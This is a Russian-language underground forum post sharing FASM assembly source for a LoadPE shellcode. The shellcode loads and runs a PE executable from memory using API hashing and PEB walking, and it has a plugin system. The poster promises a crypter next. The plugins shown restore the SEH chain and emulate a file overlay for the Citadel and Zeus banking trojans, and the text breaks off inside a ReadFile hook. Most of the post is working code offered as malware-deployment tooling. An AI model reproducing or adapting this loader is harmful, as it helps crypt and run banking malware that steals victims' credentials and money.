1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

[FASM] LoadPE шеллкод с системой расширений

Тема в разделе "Программирование", создана пользователем 0xDADA11C7, 5 янв 2015.

  1. TopicStarter Overlay
    0xDADA11C7

    0xDADA11C7

    Регистрация:
    5 янв 2015
    Сообщения:
    8
    Симпатии:
    23
    Этот шеллкод предназначен для старта исполняемого файла с памяти процеса. поддерживает TLS, не требует релоков. Решил выложить, потому что нигде больше не видел системы плагинов. Криптор тоже скоро выложу. В плагинах нужно использовать только первые _3B1P_PLUGIN_HEADER.wSize байт, т.к дальше идет используемая только при выбое плагина с диска сторка, завершающаяся нулём.

    Please login or register to view links

    Для его исполнения нужно создать следующую структуру данных:

    Код:
    +========================+
    | _LOADPE структура      |
    +========================+-----+
    | LOADPE шеллкод         |     |
    +========================+     |
    |плагины (необязательно) |     } цепочка LoadPE 
    +========================+     |
    | конечная метка         |     |
    +========================+-----+
    |Загружаемый PE файл    |
    +========================+
    
    Параметры передаются в шеллкод с помощью патчинга. Структуру _LOADPE заполняет сам шеллкод.

    Заголовочный файл loadpe.inc
    Код:
    macro szHash name, res {
      local ..size, ..result, ..char, ..temp
      ..temp = 0
      ..result = 0
      virtual at 0
        db name, 0x0
        ..size = $
        repeat ..size
          load ..char byte from % - 1
          ..temp = (..temp shr 7) or (..temp shl 25)
          ..result = ..result xor ..temp
          ..temp = (..temp and 0xffffff00) or ..char
        end repeat
      end virtual
      res = ..result and 0xffffffff
    }
    
    struct _3B1P_PLUGIN_HEADER
      signature   db '3B1P'
      wSize       dw ?
      pReturn     dd ?
      pLoadPEData dd ?
      pEntryPoint dw ?
      dwPluginID  dd ?
    ends
    
    struct _LOADPE_DATA
      pCompareHash          dd ?
      pCompareString        dd ?
      pAltGetProcAddress    dd ?
      pGetFileHeader        dd ?
      pLoadLibraryA         dd ? 
      pGetModuleHandleA     dd ?
      pVirtualProtect       dd ?
      pOriginalFile         dd ?
      hKernel32             dd ?
      hNtdll                dd ?
      dwOriginalFileSize    dd ?
      dwImageBase           dd ?
      dwShellcodeLen        dd ?
      dwDeepOfStack         dd ?
      dwReserved1           dd ?
      dwReserved2           dd ?  
    ends
    
    struct _LOADPE
      pluginData   db 0x1000 dup (?)
      pluginsQueue db 0x200 dup (?)
      loadpeData   _LOADPE_DATA
    ends
    
    macro __3BIP_PLUGIN_HEADER__ entryPoint, szPluginName {
      szHash szPluginName, hashPluginName
      _PLUGIN_HEADER_:
      _PLUGIN_BEGIN_ = _PLUGIN_HEADER_
      .signature    db '3B1P'
      .wSize        dw _PLUGIN_END_-_PLUGIN_BEGIN_
      .pReturn      dd ?
      .pLoadPEData  dd ?
      .pEntryPoint  dw entryPoint-_PLUGIN_BEGIN_
      .dwPluginID   dd hashPluginName
    }
    
    macro __3BIP_PLUGIN_TAIL__ name {
      _PLUGIN_END_:
      db name, 0x0
    }
    
    Главный файл шеллкода loadpe.asm
    Код:
    use32
    format binary
    
    include '%FASMINC%\win32a.inc'
    include 'pe.inc'
    include 'loadpe.inc'
    
    szHash 'KERNEL32', hashKERNEL32
    szHash 'NTDLL', hashNTDLL
    
    szHash 'LoadLibraryA', hashLoadLibraryA
    szHash 'VirtualProtect', hashVirtualProtect
    szHash 'GetModuleHandleA', hashGetModuleHandleA
    szHash 'VirtualFree', hashVirtualFree
    
    __LOADPE_BEGIN__:
    __LOADPE_PLUGINS_RETURN__ = loadPE_main.__LOADPE_PLUGINS_RETURN__
    start:
    
    jmp loadPE_main
    dwOriginalFileSize    dd 0xBEA51F3D;
    dwImageBase          dd 0x0
    dwShellcodeLen          dd 0x0
    dwDeepOfStack          dd 0x0
    pOriginalTLSIndex     dd 0x0
    
    proc loadSection pSectionHeader:DWORD, image_base:DWORD, pFileImageBase:DWORD, SectionAlignment:DWord
        pusha 
        cld
        mov     edx, [pSectionHeader]
        mov     ecx, [edx+IMAGE_SECTION_HEADER.VirtualSize]
        mov     edi, [image_base]
        add     edi, [edx+IMAGE_SECTION_HEADER.VirtualAddress]
        mov     esi, [SectionAlignment]
        add     ecx, esi
        mov     eax, ecx
        xor     edx, edx
        div     esi
        sub     ecx, edx
        xor     eax, eax
        rep     stosb
        mov     edx, [pSectionHeader]
        mov     esi, [pFileImageBase]
        add     esi, [edx+IMAGE_SECTION_HEADER.PointerToRawData]
        mov     ecx, [edx+IMAGE_SECTION_HEADER.SizeOfRawData]
        mov     edi, [edx+IMAGE_SECTION_HEADER.VirtualAddress]
        add     edi, [image_base]
        rep     movsb
    .exit:
        popa
        ret
    endp
    
    proc    GetHashSz strz
        push    ecx
        push    ebx
        push    DWord [strz]
        pop     ecx
        xor     ebx, ebx
        push    ebx
    .CalcHash:
        ror     ebx, 7
        xor     [esp], ebx
        mov     bl, Byte [ecx]
        inc     ecx
        cmp     bl, 0x0
        jnz     .CalcHash
        pop     eax
        pop     ebx
        pop     ecx
        ret
    endp
    
    proc loadImportDirectoryTable pAPITable:DWORD, image_base:DWORD, directory_entry:DWORD
    
      local .lookup_table:DWORD, .import_address_table:DWORD, .dll_image_base:DWORD
    
        pushad
        mov     eax, [directory_entry]
        mov     eax, [eax+IMAGE_IMPORT_DESCRIPTOR.Name_]
        add     eax, [image_base]
       ;load the corresponding dll
        mov     ebx, [pAPITable]
        stdcall DWord [ebx+_LOADPE_DATA.pLoadLibraryA], eax
        test    eax,eax
        jz        .exit_error
        mov     [.dll_image_base],eax
        mov     edx, [directory_entry]
        mov     eax, [edx+IMAGE_IMPORT_DESCRIPTOR.FirstThunk]
        add     eax, [image_base]
        mov     [.import_address_table],eax
        mov     [.lookup_table],eax
        mov     eax, [edx+IMAGE_IMPORT_DESCRIPTOR.OriginalFirstThunk]
        test    eax, eax
        jz        .OFTIsNull
        add     eax, [image_base]
        mov     [.lookup_table], eax
    .OFTIsNull:
        xor     ecx, ecx
    .next_lookup_entry:
        mov     eax, DWord [.lookup_table]
        add     eax, ecx
        mov     eax, DWord [eax]
        test    eax, eax
        jz        .exit_success
        test     eax, IMAGE_ORDINAL_FLAG32
        jnz     .byordinal
    .byname:
        add     eax, [image_base]
        lea     eax, [eax+IMAGE_IMPORT_BY_NAME.Name_]
        push    ecx
        stdcall AltGetProcAddress, [pAPITable], [.dll_image_base], [ebx+_LOADPE_DATA.pCompareString], eax
        pop     ecx
        test    eax, eax
        jz        .exit_error
        mov     edx, [.import_address_table]
        mov     [edx+ecx], eax
        add     ecx, 4
        jmp     .next_lookup_entry
    .byordinal:
        and     eax, 0x7FFFFFFF
        push    ecx
        stdcall AltGetProcAddress, [pAPITable], [.dll_image_base], 0x0, eax
        pop     ecx
        mov     edx, [.import_address_table]
        mov     [edx+ecx], eax
        add     ecx, 4
        jmp     .next_lookup_entry
    .exit_success:
        popa
        xor eax,eax
        inc eax
        ret
    .exit_error:
        popad
        xor eax, eax
        ret
    endp
    
    proc setPermissions APITable:DWORD, pImageFileHeader:DWORD, pFileImageBase:DWORD
    
     local .number_of_sections:DWORD, .image_base:DWORD, .section_headers:DWORD, .pe_header_size:DWORD, .vprotect_ret:DWORD, .retval:DWORD
    
        pusha
        xor     eax, eax
        mov     [.retval], eax
        mov     edx, [pImageFileHeader]
        movzx    eax, Word [edx+IMAGE_FILE_HEADER.NumberOfSections]
        mov     [.number_of_sections], eax
        add     edx, sizeof.IMAGE_FILE_HEADER
        mov     eax, [edx+IMAGE_OPTIONAL_HEADER32.ImageBase]
        mov     [.image_base], eax
        lea     ebx, [edx+IMAGE_OPTIONAL_HEADER32.DataDirectory]
        mov     eax, [edx+IMAGE_OPTIONAL_HEADER32.NumberOfRvaAndSizes]
        mov     edx, sizeof.IMAGE_DATA_DIRECTORY
        mul     edx
        add     eax, ebx
        mov     [.section_headers], eax
        mov     eax, sizeof.IMAGE_SECTION_HEADER
        mov     edx, [.number_of_sections]
        mul     edx
        add     eax, [.section_headers]
        mov     ebx, [pFileImageBase]
        sub     eax, ebx
        mov     [.pe_header_size], eax
        mov     ebx, [APITable]
        lea     eax, [.vprotect_ret]
        stdcall    DWord [ebx+_LOADPE_DATA.pVirtualProtect], [.image_base], [.pe_header_size], PAGE_READONLY, eax
        test    eax, eax
        jz        .exit
        mov     ecx, [.number_of_sections]
        mov     ebx, [.section_headers]
    .load_section_loop:
        stdcall    setSection, [APITable], ebx
        test    eax, eax
        jz        .exit
        add     ebx, sizeof.IMAGE_SECTION_HEADER
        loop    .load_section_loop
        inc     [.retval]
    .exit:
        popa
        mov     eax, [.retval]
        ret
    endp
    
    proc    HashCompare szName, dwVal
      local   iResult:DWORD
        pusha
        xor     esi, esi
        mov     DWord [iResult], esi
        stdcall GetHashSz, [szName]
        cmp     DWord [dwVal], eax
        jz        .FoundProcname
        not     DWord [iResult]
    .FoundProcname:
        popa
        push    DWord [iResult]
        pop     eax
        ret
    endp
    
    proc    loadImportTable pAPITable, image_base
      local   .import_table:DWORD
      local   iResult:DWORD
      local   .null_directory_entry[0x14]:BYTE
        pusha
        push    DWord [image_base]
        pop     edi
        push    DWord [edi + IMAGE_DOS_HEADER.e_lfanew]
        pop     edx
        lea     edx, [edx+edi + 4 + sizeof.IMAGE_FILE_HEADER+IMAGE_OPTIONAL_HEADER32.DataDirectory+sizeof.IMAGE_DATA_DIRECTORY]
        mov     edx, DWord [edx+IMAGE_DATA_DIRECTORY.VirtualAddress]
        cmp     edx, 0
        jz      .exit
        add     edx, edi
        push    edx
        pop     DWord [.import_table]
        xor     eax, eax
        mov     ecx, sizeof.IMAGE_IMPORT_DESCRIPTOR
        lea     edi, [.null_directory_entry]
        rep     stosb
        push    DWord [.import_table]
        pop     ebx
    .next_directory_entry:
        lea     esi, [.null_directory_entry]
        push    ebx
        pop     edi
        mov     ecx, sizeof.IMAGE_IMPORT_DESCRIPTOR
        rep     cmpsb
        je        .exit
        stdcall loadImportDirectoryTable, [pAPITable], [image_base], ebx
        add     ebx, 0x14
        jmp     .next_directory_entry
    .exit:
        popa
        ret
    endp
    ;        stdcall setSection, [APITable], ebx
    
    proc    setSection pAPITable, pSectionHeader
      local   .vprotect_ret:DWORD
      local   .retval:DWORD
      local   .section_flags:DWORD
        pusha
        mov     DWord [.retval], DWORD 0x0
        push    DWord [pSectionHeader]
        pop     ecx
    ;section execute/read/write?
        mov     ebx, DWord [ecx+IMAGE_SECTION_HEADER.Characteristics]
        and     ebx, IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
        cmp     ebx, IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
        jne     .no_execute_read_write
        mov     DWord [.section_flags], PAGE_EXECUTE_READWRITE
        jmp     .set_memory
    .no_execute_read_write:
        mov     ebx, DWord [ecx+IMAGE_SECTION_HEADER.Characteristics]
        and     ebx, IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ
        cmp     ebx, IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ
        jne     .no_execute_read
        mov     DWord [.section_flags], PAGE_EXECUTE_READ
        jmp     .set_memory
    .no_execute_read:
        mov     ebx, DWord [ecx+IMAGE_SECTION_HEADER.Characteristics]
        and     ebx, IMAGE_SCN_MEM_WRITE or IMAGE_SCN_MEM_READ
        cmp     ebx, IMAGE_SCN_MEM_WRITE or IMAGE_SCN_MEM_READ
        jne    .no_read_write
        mov     DWord [.section_flags], PAGE_READWRITE
        jmp     .set_memory
    .no_read_write:
        mov     edi, DWord [ecx+IMAGE_SECTION_HEADER.Characteristics]
        and     edi, IMAGE_SCN_MEM_READ
        cmp     edi, IMAGE_SCN_MEM_READ
        jne     .no_read
        mov     DWord [.section_flags], PAGE_READONLY
        jmp     .set_memory
    .no_read:
        mov     DWord [.section_flags], PAGE_NOACCESS
    .set_memory:
        mov     eax, DWord [pSectionHeader]
        mov     edi, DWord [eax + IMAGE_SECTION_HEADER.VirtualAddress]
        mov     esi, DWord [pAPITable]
        add     edi, DWord [esi+_LOADPE_DATA.dwImageBase]
        lea     edx, [.vprotect_ret]
        mov     ecx, [eax + IMAGE_SECTION_HEADER.VirtualSize]
        stdcall DWord [esi + _LOADPE_DATA.pVirtualProtect], edi, ecx, [.section_flags], edx
        popa
        xor     eax, eax
        inc     eax
        ret
    endp
    
    proc  strToUpcase szString
        pusha
        mov     eax, [szString]
        xor     ebx, ebx
    .up:
        movzx   edx, Byte [eax]
        test    edx, edx
        jz        .down
        cmp     edx, 0x61
        jb        .nextChar
        cmp     edx, 0x7A
        ja        .nextChar
        sub     edx, 0x20
        mov     Byte [eax], dl
    .nextChar:
        inc     eax
        jmp     short .up
    .down:
        popa   
        ret
    endp
    
    proc    AltGetProcAddress pAPITable, hLib, fCompareProc, dwVal
    
      local   dwOrdinal:DWORD
      local   iResult:DWORD
      local   pExportDirectory:DWORD
      local   pExportDirectoryBound:DWORD
      local   szFncName[0x20]:BYTE
      local   szLibName[0x20]:BYTE
    
        pusha
        push    0x0
        pop     DWord [iResult]
        mov     ecx, DWord [hLib]
        cmp     Word [ecx], WORD 0x5a4d
        jne     .End
        movzx   esi, Word [ecx+0x3c]
        add     esi, ecx
        cmp     DWord [esi], DWORD 0x4550;check <'PE',0,0>
        jne     .End
        mov     edx, DWord [esi+0x78]
        add     edx, ecx
        mov     DWord [pExportDirectory], edx
        mov     eax, edx
        add     eax, DWord [esi+0x7C]
        mov     DWord [pExportDirectoryBound], eax
        mov     ebx, DWord [edx+0x18]
        xor     esi, esi
        mov     eax, DWord [edx+0x20]
        add     eax, ecx
        cmp     DWord [fCompareProc], 0x0
        jnz     .MainLoop
        mov     esi, DWord [dwVal]
        sub     esi, [edx+0x10]
        mov     DWord [dwOrdinal], esi
        jmp     short .FoundOrdinal
    .MainLoop:
        push    DWord [eax]
        pop     edi
        lea     edi, [ecx+edi]
        push    eax
        stdcall [fCompareProc], edi, [dwVal]
        test    eax, eax
        pop     eax
        jz        .FoundProcname
        add     eax, 0x4
        dec     ebx
        inc     esi
        or        ebx, ebx
        jnz     .MainLoop
        jmp     .End
    .FoundProcname:
        mov     ebx, DWord [pExportDirectory]
        shl     esi, 1
        add     esi, DWord [ebx+0x24]
        movzx   esi, Word [esi+ecx]
        mov     DWord [dwOrdinal], esi
    .FoundOrdinal:
        mov     ebx, DWord [pExportDirectory]
        mov     esi, DWord [dwOrdinal]
        shl     esi, 2
        add     esi, ecx
        add     esi, DWord [ebx+0x1C]
        mov     edi, DWord [esi]
        add     edi, ecx
        mov     DWord [iResult], edi
        cmp     edi, DWord [pExportDirectory]
        jb        .End
        cmp     edi, DWord [pExportDirectoryBound]
        jae     .End
        lea     esi, [szLibName]
    .UpLibName:
        movzx   eax, Byte [edi]
        cmp     eax, '.'
        jz        .EndLibName
        mov     Byte [esi], al
        inc     esi
        inc     edi
        jmp     short .UpLibName
    .EndLibName:
        mov     Byte [esi], 0x0
        lea     eax, [szLibName]
        stdcall strToUpcase, eax
        lea     eax, [szLibName]
        stdcall GetHashSz, eax
        mov     ebx, [pAPITable]
        cmp     eax, hashKERNEL32
        jz        .getKernel32
        cmp     eax, hashNTDLL
        jnz     .callGetModuleHandle
    .getNtdll:
        mov     eax, DWord [ebx + _LOADPE_DATA.hNtdll]
        jmp     short .searchFncName    
    .getKernel32:
        mov     eax, DWord [ebx + _LOADPE_DATA.hKernel32]
        jmp     short .searchFncName
    .callGetModuleHandle:
        mov     DWord [esi], 0x4C4C442E
        mov     Byte [esi+0x4], 0x0
        lea     eax, [szLibName]
        stdcall DWord [ebx + _LOADPE_DATA.pGetModuleHandleA], eax
        cmp     eax, 0
        jnz     .searchFncName
        lea     eax, [szLibName]
        stdcall DWord [ebx + _LOADPE_DATA.pLoadLibraryA], eax
    .searchFncName:
        mov     DWord [hLib], eax
        lea     esi, [szFncName] 
        inc     edi
    .UpFncName:
        movzx   eax, Byte [edi]
        test    eax, eax
        jz        .EndFncName
        mov     Byte [esi], al
        inc     esi
        inc     edi
        jmp     short .UpFncName
    .EndFncName:
        mov     Byte [esi], 0x0
        lea     esi, [szFncName] 
        cmp     Byte [esi], 0x23
        jz        .forwardingByOrdinal
        stdcall AltGetProcAddress, ebx, [hLib], [ebx + _LOADPE_DATA.pCompareString], esi
        jmp     .foundAddr
    .forwardingByOrdinal:
        inc     esi
        stdcall strtonum, esi
        stdcall AltGetProcAddress, ebx, [hLib], 0x0, eax
    .foundAddr:
        mov     DWord [iResult], eax
    .End:
        popa    
        mov     eax, DWord [iResult]
        ret
    endp
    
    proc    verifyPE pImagePE
      local   iResult:DWORD
        pusha
        xor     edx, edx
        mov     edi, [pImagePE]
        movzx   ecx, Word [edi]
        cmp     ecx, 0x5a4d
        jnz     .Exit
        mov     eax, DWord [edi+IMAGE_DOS_HEADER.e_lfanew]
        add     edi, eax
        cmp     DWord [edi], 0x4550
        jne     .Exit
        add     edi, 0x4
        xchg    edi, edx
    .Exit:
        mov     DWord [esp+0x1C], edx
        popa
        ret
    endp
    
    proc  loadFile pAPITable:DWORD, pImageFileHeader:DWORD, pFileImageBase:DWORD
      local .retval:DWORD
      local .iSectNum:DWORD
      local .pImageOptionalHeader:DWORD
      local .dwOldProtect:DWORD
      local .pSectionHeaders:DWORD
      local .iPEHeaderSize:DWORD
      local .SizeOfImage:DWORD
      local .SectionAlignment:DWORD
    
        pusha
        xor     eax, eax
        mov     [.retval], eax
        mov     ebx, [pAPITable]
        mov     edx, [pImageFileHeader]
        movzx    eax, Word [edx+IMAGE_FILE_HEADER.NumberOfSections]
        mov     [.iSectNum], eax 
        lea     eax, [edx+sizeof.IMAGE_FILE_HEADER]
        mov     [.pImageOptionalHeader], eax
        push    DWord [eax + IMAGE_OPTIONAL_HEADER32.SectionAlignment]
        pop     DWord [.SectionAlignment]
        mov     eax, [eax + IMAGE_OPTIONAL_HEADER32.SizeOfImage]
        mov     [.SizeOfImage], eax
        lea     eax, [.dwOldProtect]
        stdcall    DWord [ebx+_LOADPE_DATA.pVirtualProtect], DWord [ebx+_LOADPE_DATA.dwImageBase], [.SizeOfImage], PAGE_READWRITE, eax
        test    eax, eax
        jz        .Exit
        cld
        xor     eax, eax
        mov     edi, DWord [ebx+_LOADPE_DATA.dwImageBase]
        mov     ecx, [.SizeOfImage]
        cld
        rep     stosb
        mov     edx, [.pImageOptionalHeader] 
        mov     eax, [edx + IMAGE_OPTIONAL_HEADER32.NumberOfRvaAndSizes]
        lea     ecx, [edx + IMAGE_OPTIONAL_HEADER32.DataDirectory]
        mov     edx, sizeof.IMAGE_DATA_DIRECTORY
        mul     edx
        add     eax, ecx
        mov     [.pSectionHeaders], eax
        mov     eax, sizeof.IMAGE_SECTION_HEADER
        mov     edx, [.iSectNum]
        mul     edx
        mov     ecx, [pFileImageBase]
        add     eax, [.pSectionHeaders]
        sub     eax, ecx
        mov     [.iPEHeaderSize], eax
        mov     edi, DWord [ebx+_LOADPE_DATA.dwImageBase]
        mov     ecx, [.iPEHeaderSize]
        mov     esi, [pFileImageBase]
        rep     movsb
        mov     ecx, [.iSectNum]
        mov     esi, [.pSectionHeaders]
    .load_section_loop:
        stdcall    loadSection, esi, DWord [ebx+_LOADPE_DATA.dwImageBase], [pFileImageBase], [.SectionAlignment]
        test    eax, eax
        jz        .Exit
        add     esi, sizeof.IMAGE_SECTION_HEADER
        dec     ecx
        jnz     .load_section_loop
        inc     [.retval]
    .Exit:
        popa
        mov     eax, [.retval]
        ret
    endp 
    
    proc    StringCompare szName, dwVal
      local   iResult:DWORD
        pusha
        xor     edi, edi
        mov     DWord [iResult], edi
        push    DWord [szName]
        pop     edx
        push    DWord [dwVal]
        pop     ecx
    .mainLoop:
        xor     ebx, ebx
        mov     bl, Byte [edx]
        movzx   eax, Byte [ecx]
        cmp     ebx, eax
        jnz     .Err
        test    ebx, ebx
        jz        .FoundProcname
        inc     ecx
        inc     edx
        jmp     .mainLoop
    .Err:
        not     DWord [iResult]
    .FoundProcname:
        popa
        mov     eax, DWord [iResult]
        ret
    endp
    
    proc    loadPE_main
    
      local   pMyAddr:DWORD
      local   pFileHeader:DWORD
      local   pPEImage:DWORD
      local   iResult:DWORD
      local   pOldTLSIndex:DWORD
      local   dwTLSIndexValue:DWORD
      local   pImageBase:DWORD
    
        pusha
        call    .delta
    .delta:
        pop     edi
        sub     edi, .delta - __LOADPE_BEGIN__
        mov     DWord [pMyAddr], edi
        mov     eax, edi
        add     eax, DWord [edi+dwShellcodeLen-__LOADPE_BEGIN__]
        mov     [pPEImage], eax
        lea     ebx, [edi-sizeof._LOADPE_DATA]
        push    DWord [edi+dwOriginalFileSize-__LOADPE_BEGIN__]
        pop     DWord [ebx+_LOADPE_DATA.dwOriginalFileSize]
        push    DWord [edi+dwImageBase-__LOADPE_BEGIN__]
        pop     DWord [ebx+_LOADPE_DATA.dwImageBase]
        push    DWord [edi+dwShellcodeLen-__LOADPE_BEGIN__]
        pop     DWord [ebx+_LOADPE_DATA.dwShellcodeLen-__LOADPE_BEGIN__]
        push    DWord [edi+dwDeepOfStack-__LOADPE_BEGIN__]
        pop     DWord [ebx+_LOADPE_DATA.dwDeepOfStack-__LOADPE_BEGIN__]
        push    DWord [edi+pOriginalTLSIndex-__LOADPE_BEGIN__]
        pop     DWord [pOldTLSIndex]
        mov     eax, DWord [fs:0x30]
        mov     eax, DWord [eax+0xC]
        mov     eax, DWord [eax+0x1C]
        push    DWord [eax+0x8]
        pop     DWord [ebx+_LOADPE_DATA.hNtdll]
        push    DWord [pPEImage]
        pop     DWord [ebx+_LOADPE_DATA.pOriginalFile]
        lea     eax, [edi+StringCompare-__LOADPE_BEGIN__]
        mov     DWord [ebx+_LOADPE_DATA.pCompareString], eax
        lea     eax, [edi+HashCompare-__LOADPE_BEGIN__]
        mov     DWord [ebx+_LOADPE_DATA.pCompareHash], eax
        lea     eax, [edi+verifyPE-__LOADPE_BEGIN__]
        mov     DWord [ebx+_LOADPE_DATA.pGetFileHeader], eax
        call    GetK32
        mov     DWord [ebx+_LOADPE_DATA.hKernel32], eax
        lea     eax, [edi+AltGetProcAddress-__LOADPE_BEGIN__]
        mov     DWord [ebx+_LOADPE_DATA.pAltGetProcAddress], eax
        stdcall AltGetProcAddress, ebx, DWord [ebx+_LOADPE_DATA.hKernel32], [ebx+_LOADPE_DATA.pCompareHash], hashLoadLibraryA
        mov     DWord [ebx+_LOADPE_DATA.pLoadLibraryA], eax
        stdcall AltGetProcAddress, ebx, DWord [ebx+_LOADPE_DATA.hKernel32], [ebx+_LOADPE_DATA.pCompareHash], hashVirtualProtect
        mov     DWord [ebx+_LOADPE_DATA.pVirtualProtect], eax
        stdcall AltGetProcAddress, ebx, DWord [ebx+_LOADPE_DATA.hKernel32], [ebx+_LOADPE_DATA.pCompareHash], hashGetModuleHandleA
        mov     DWord [ebx+_LOADPE_DATA.pGetModuleHandleA], eax
        lea     eax, [iResult]
        stdcall verifyPE, [pPEImage]
        test    eax, eax
        jz        .End
        push    eax
        pop     DWord [pFileHeader]
        stdcall loadFile, ebx, [pFileHeader], [pPEImage]
        test    eax, eax
        jz        .End
        stdcall loadImportTable, ebx, [ebx+_LOADPE_DATA.dwImageBase]
        stdcall setPermissions, ebx, [pFileHeader], [pPEImage]
        mov     eax, edi
        add     eax, __LOADPE_END__-__LOADPE_BEGIN__
        mov     ecx, edi
        sub     ecx, sizeof._LOADPE - _LOADPE.pluginsQueue
        mov     esi, [pFileHeader]
        mov     esi, [esi+sizeof.IMAGE_FILE_HEADER+IMAGE_OPTIONAL_HEADER32.AddressOfEntryPoint]
        add     esi, [ebx+_LOADPE_DATA.dwImageBase]
        stdcall FillPluginQueue, eax, ecx, ebx, esi
        pusha
        jmp     ecx
    .__LOADPE_PLUGINS_RETURN__:
    .End:
        popa
        mov     eax, DWord [iResult]
        ret
    endp
    
    proc    GetK32 
      local   iResult:DWORD
        pusha
        mov     eax, DWord [fs:0x30]
        mov     eax, DWord [eax+0xC]
        mov     eax, DWord [eax+0x1C]
    .NextModule:
        push    DWord [eax+0x8]
        pop     DWord [iResult]
        push    DWord [eax+0x20]
        pop     ebx
        mov     eax, DWord [eax]
        movzx   ecx, Byte [ebx+0x18]
        cmp     ecx, 0x0
        jne     .NextModule
        movzx   ecx, Byte [ebx]
        cmp     ecx, 0x6b
        je        .Found_K32
        cmp     ecx, 0x4b
        jne     .NextModule
    .Found_K32:
        popa
        push    DWord [iResult]
        pop     eax
        ret
    endp
    
    proc strtonum strz
        pusha
        mov     edi, [strz]
        stdcall strlen, edi
        test    eax, eax
        jz        .err
        xchg    ecx, eax
        lea     esi, [edi+ecx-0x1]
        xor     edi, edi
        mov     ebx, edi
    .up:
        push    ebx
        test    ebx, ebx
        jz        .isZero
        mov     eax, 0xA
        jmp     .loopUp
    .isZero:
        xor     eax, eax
        inc     eax
        jmp     short .endPower
    .loopUp:
        dec     ebx
        jz        short .endPower
        mov     edx, 0xA
        mul     edx
        jmp     short .loopUp
    .endPower:
        pop     ebx
        movzx   edx, Byte [esi]
        cmp     edx, 0x30
        jb        .err
        cmp     edx, 0x39
        ja        .err
        sub     edx, 0x30
        mul     edx
        add     edi, eax
        inc     ebx
        dec     esi
        dec     ecx
        jnz     .up
        xchg    eax, edi
        clc
        jmp     .exit
    .err:
        xor     eax, eax
        stc
    .exit:
        mov     DWord [esp+0x1C], edi
        popa
        ret
    endp
    
    proc strlen s
        pusha
        cld
        mov     esi, 
        xor     eax, eax
        mov     ecx, eax
    .up:
        lodsb
        test    eax, eax
        je        short .down
        inc     ecx
        jmp     short .up
    .down:
        mov     [esp+0x1C], ecx
        popa
        ret
    endp
    
    proc LoadTLSIndex pImageBase, pOldTLSIndex, pDwTLSIndexValue
        pusha
        mov      ebx, [pOldTLSIndex]   
        cmp      ebx, 0h
        jz       .e
        stdcall  verifyPE, [pImageBase]
        add      eax, sizeof.IMAGE_FILE_HEADER+IMAGE_OPTIONAL_HEADER32.DataDirectory+sizeof.IMAGE_DATA_DIRECTORY*0x9
        mov      eax, DWord [eax]
        add      eax, [pImageBase]
        mov      eax, DWord [eax+0x8]
        mov      eax, DWord [eax]
        mov      edx, [pDwTLSIndexValue]
        mov      DWord [edx], eax
    .e:
        popa
        ret
    endp
    
    proc FillPluginQueue pFirstChain, pPluginQueueCmds, pLoadPEData, pReturn
         mov     edi, [pPluginQueueCmds]
         mov     esi, [pFirstChain]
         mov     edx, DWord [pLoadPEData]
    .up:
         cmp     DWord [esi], 0x4B504134
         jnz     .checkPlugin
         cmp     Word [esi+0x4], 0x41
         jz      .end
    .checkPlugin:
         cmp     DWord [esi], 0x50314233
         jnz     .end
         mov     Byte [edi], 0xBE
         mov     DWord [edi+0x1], esi
         mov     Byte [edi+0x5], 0xBF
         mov     DWord [esi+_3B1P_PLUGIN_HEADER.pLoadPEData], edx
         mov     DWord [edi+0x6], edx
         mov     Byte [edi+0xA], 0xB8
         movzx   ecx, Word [esi+_3B1P_PLUGIN_HEADER.pEntryPoint]
         mov     eax, ecx
         add     eax, esi
         mov     DWord [edi+0xB], eax
         mov     Word [edi+0xF], 0xE0FF
         add     edi, 0x11
         mov     DWord [esi+_3B1P_PLUGIN_HEADER.pReturn], edi
         movzx   ecx, Word [esi+_3B1P_PLUGIN_HEADER.wSize]
         add     esi, ecx
         jmp     .up
    .end:
         mov     Byte [edi], 0x68
         push    [pReturn]
         pop     DWord [edi+0x1]
         mov     Byte [edi+0x5], 0xC3
         jmp     DWord [pPluginQueueCmds]
    endp
    
    __LOADPE_END__:
    


    Плагин, который раскручивает цепочку SEH с целью восстановления оригинального обработчика исключений и возвращает стек в первоначальное состояние:
    Код:
    include '%FASMINC%\Win32a.inc'
    include 'loadpe.inc'
    szHash 'UnhandledExceptionFilter', hashUnhandledExceptionFilter
    
    org 0x0
    use32
    __3BIP_PLUGIN_HEADER__ start, 'RESTORESEH'
    pUnhandledExceptionFilter dd 0
    start:
         stdcall DWord [edi+_LOADPE_DATA.pAltGetProcAddress], edi, DWord [edi+_LOADPE_DATA.hKernel32], DWord [edi+_LOADPE_DATA.pCompareHash], hashUnhandledExceptionFilter
         xor     edx, edx
         dec     edx
         mov     eax, DWord [fs:0]
    .unchain:
         cmp     DWord [eax], edx
         jz      .down
         mov     eax, DWord [eax]
         jmp     short .unchain
    .down:
         mov     DWord [fs:0], eax
         add     esp, DWord [edi+_LOADPE_DATA.dwDeepOfStack]
         jmp     DWord [esi+_3B1P_PLUGIN_HEADER.pReturn]
    __3BIP_PLUGIN_TAIL__ 'RESTORESEH'
    
    Плагин эмуляции EOF (оверлея) PE файла для Сitadel і Zeus.
    Код:
    include '%FASMINC%\Win32a.inc'
    include 'loadpe.inc'
    include 'pe.inc'
    
    szHash 'ReadFile', hashReadFile
    szHash 'CreateFileW', hashCreateFileW
    szHash 'GetFileSizeEx', hashGetFileSizeEx
    szHash 'lstrcmpiW', hashlstrcmpiW
    szHash 'SetLastError', hashSetLastError
    
    
    org 0x0
    use32
    
    __3BIP_PLUGIN_HEADER__ start, 'CITADEL'
    
    proc ReadFile_Hook hFile, lpBufer, nNumberOfBytesToRead, lpNumberOfBytesRead, lpOverlapped
         pusha
         call    .delta
    .delta:
         pop     ebx
         sub     ebx, .delta-_PLUGIN_BEGIN_
         cmp     DWord [ebx+hFileExec], 0x0
         jz      .readOriginal
         mov     eax, DWord [ebx+hFileExec]
         cmp     eax, [hFile]
         jnz     .readOriginal
         mov     edi, DWord [lpBufer]
         mov     esi, DWord [ebx+_3B1P_PLUGIN_HEADER.pLoadPEData]
